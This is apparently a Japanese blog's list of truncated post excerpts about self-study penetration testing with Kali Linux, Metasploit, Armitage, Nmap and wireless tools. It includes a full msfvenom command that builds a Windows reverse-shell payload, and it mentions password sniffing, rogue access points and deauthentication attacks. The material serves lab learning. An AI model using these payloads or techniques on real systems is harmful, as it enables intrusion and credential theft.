Hello there, ('ω')ノ Kali Linuxをアップデートしようとすると下記のようなエラーが。 どうやらハッシュ値が異なるようで。 対応するのが面倒だったので、他に仮想環境を構築してみることに。 それでも同じエラーが。 Parott Securityでも同じエラーが。 た…

Hello there, ('ω')ノ デジタルフォレンジックツールでデータをテストするために。 NickMikusの作成したイメージを利用することができて。 http://dftt.sourceforge.net/test11/index.html 他には下記のサイトにも。 http://dftt.sourceforge.net/ さらには…

Hello there, ('ω')ノ フォレンジック取得とハッシュに使用されるツールで。 国防総省サイバー犯罪センターのデータダンプ（dc3dd）があって。 dc3ddは、データダンプ（DD）ツールのパッチで。 なので、DDが更新されるたびに定期的に更新されて。 他のツール…

Hello there, ('ω')ノ まずは、攻撃者となるKali LinuxのIPアドレスの確認から。 今回は、Windowsのリバースシェルペイロードを作成することに。 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=4444 -f exe -o payload.exe 作成し…

Hello there, ('ω')ノ まずは、AWS S3バケットをスキャンするツールのインストールから。 sudo pip3 install s3scanner AWSのコマンドライン機能の設定を。 aws configure aws configureaws /home/kali/Pictures/Screenshot_2022-0 Webサイトのホスティング…

Hello there, ('ω')ノ 今回は、KingstonのUSBで。 USBは、256GBのGen2対応を。 Kali LinuxのLive USBの作る際には。 下記よりliveバージョンをダウンロードしてから。 ダウンロードがなかなかできないときは、アーカイブサイトからダウンロードして。 https:…

Hello there, ('ω')ノ Parrotのターミナルが気になったので、Kaliでもと。 まずは、下記へアクセスして、ファイルをダウンロードして。 bit.ly/kali-theme 現在の.bashrcの名前を.bashrc_oldに変更してから。 ダウンロードしたファイルを移動させて.bashrcへ…

Hello there, ('ω')ノ まずは、おきまりのapt updateをしてから。 公式のDocker PGPキーを追加して。 次にaptを構成して、Dockerをダウンロード、インストール、更新できるようにして。 Dockerをaptに追加したら、aptをもう一度更新しておいて。 apt update …

Hello there, ('ω')ノ 本日もKali Linuxに振り回され、やりたいことができず。 今年の春前あたりからOVAファイルを仮想環境にインポートして使い始めると。 これまでとはデフォルトのログインIDもパスワードも変更となって。 armitageもメニューから削除され…

Hello there, ('ω')ノ 昨日の夕刻に国からの指摘をうけて急遽、ホームページを新規作成することに。 指摘から24時間内になんとか対応したもののすでにヘトヘト状態で。 metasploit frameworkの使い方も少しはわかったところで。 どのようなストーリーで使用…

Hello there, ('ω')ノ このところ、ずっとブルースクリーンによる作業の中断が気にかかり。 おもいきってWindowsを初期化することに。 これでダメならSSDの交換までやってみようかと。 さっそく、VirtualboxをインストールしてKali LinuxのOVAファイルをイン…

Hello there, ('ω')ノ 昨夜からドツボにはまってしまって。 msfconsoleで、postgresqlに接続できなくて。 postgresqlの状態を確認しても問題ないのですが。 msfconsoleを起動して、db_statusで確認すると下記のメッセージが。 postgresql selected no connec…

Hello there, ('ω')ノ 本日は終日、ブルースクリーンの対応で。 どうしてもVirtual BoxでKali Linuxを使用していると発生して。 一度、発生すると頻繁に発生して作業が止まって。 一応、Kali Linuxの専用にPCを用意したものの仮想環境が便利な時もあってつい…

Hello there, ('ω')ノ armitageをしばらく使っていなかったら少々仕様もかわっていて。 さらにはKali Linuxにもインストールされておらず。 起動方法も少し手間になったような。 armitageの起動前には下記のデータベースの初期化や起動が必要で。 sudo msfdb…

Hello there, ('ω')ノ Armitageを起動する前にPostgreSQLとMetasploitを起動して。 Armitageを起動して。 インストールされていなかったので、インストールすることに。 以前は、Kali Linuxのメニューにあったような。 インストールするとメニューからも起動…

Hello there, ('ω')ノ Meterpreterは、メモリ内DLLインジェクションを使用する拡張可能なペイロードで。 まずは、下記コマンドでLHOSTを設定してMeterpreterペイロードを構成してから。 次にms08_067_netapiで脆弱性を取得するものの。 Linux向けに実行して…

Hello there, ('ω')ノ Metasploit Frameworkの補助モジュールにMS12_020_checkというものがあって。 これは、下記の脆弱性に対して脆弱かどうかを確認するもので。 MS12-020： リモート デスクトップの脆弱性により、リモートでコードが実行される 危険度: :…

Hello there, ('ω')ノ Network Mapper（NMAP）を使うと以下のようなことができるツールで。 ホスト発見サービス バージョンの検出 列挙 脆弱性スキャン ファイアウォールのテストと回避 Metasploit Framework内でもNMAPスキャンを開始することもできて。 ス…

Hello there, ('ω')ノ Metasploit Frameworkは、デフォルトでバックエンドのPostgreSQLを使用して。 必要なすべての情報を保存および取得できて。 まずは、下記のコマンドで、Kali LinuxでPostgreSQLを開始して。 sudo service postgresql start 次に下記の…

Hello there, ('ω')ノ ネットワークからパスワードを盗聴するpsnuffleというモジュールを実行すると。 『failed』といった嫌な文字が。 実行権限について問われているようで。 これまでのKali Linuxは、ルート権限でログインしたいたものの。 最新版ではユー…

Hello there, ('ω')ノ まずは、Metasploitable2を起動してIPアドレスを確認して。 Kali Linuxでmsfconsoleを起動して軽くウォーミングアップして。 tcpモジュールは、ポートスキャンを実行して開いているTCPポートを通知してくれて。 補助モジュール名：auxi…

Hello there, ('ω')ノ Metasploit Frameworkは、単なるコマンドラインインターフェイスで。 なので、コマンドラインコンソール（msfconsole）を習得する必要があって。 bannerコマンド：msf> banner Metasploitのを表示するために使用されるシンプルなコマン…

Hello there, ('ω')ノ Metasploit Frameworkの構造を学ぶのに簡単な方法は、閲覧して調査することで。 ということで、アプリケーションディレクトリを。 /usr/share/metasploit-framework/modules Metasploit Frameworkには、以下のカテゴリがあって。 gathe…

Hello there, まずは、airgeddon.shコマンドでAirgeddonインターフェースを開始して。 wlan0インターフェースをを選択して。 ワイヤレスアダプターを監視モードに設定して。 今回は、プロトコル設計に脆弱なWEPへの攻撃を選択して。 ターゲットの探索を選択…

Hello there, 不正なAPを作成する目的としては。 ユーザの資格情報と機密情報を取得して。 組織内の脆弱なワイヤレスクライアントを検出することで。 そこでクライアントを実際のAPから認証解除して不正APとの関連付けを作成させて。 ユーザの資格情報を取得…

Hello there, ワイヤレスネットワークは、パスワードと関連付けされていて。 ユーザがパスフレーズを入力するとPCなどのデバイスはネットワーク上で認証され。 使用可能なリソースにアクセスできるようになるわけで。 そこで、認証解除攻撃を開始するには、…

Hello there, 引き続き、airodump-ngの機能について。 まずは、ifconfigでアダプタの状況を確認して。 なれてきたら、いきなりプロセスを終了させて。 ワイヤレスアダプタの監視モードを有効にして。 アクセスポイントの情報を表示させて。 フィルタリングす…

Hello there, airodump-ngは、パケットスニッフィングができて。 このツールをつかうと ワイヤレスAP 関連付けられているクライアントデバイス 関連付けられていないクライアントデバイス（ステーション） 暗号化タイプ SSID APの製造元 など が表示でき。 …

Hello there, いつもマイクロソフト製品を使って頭を悩ませるのはライセンス費用であって。 さらには、Windowsの更新も面倒だったりと。 Linuxが使いやすくなってきたのでコストを抑えたいなら移行の検討もよろしいかと。 ただ、毎回悩まされるのはオフィス…

Hello there, いつも使っているLGのgramの15インチが8万円台で購入できたので。 さっそく、本体にKali Linuxをインストールすることに。 仮想上だとどちらのエラーなのかわからなかったりと無駄な時間を費やすので。 LGのgramは、BIOSでUSBからの起動を許可…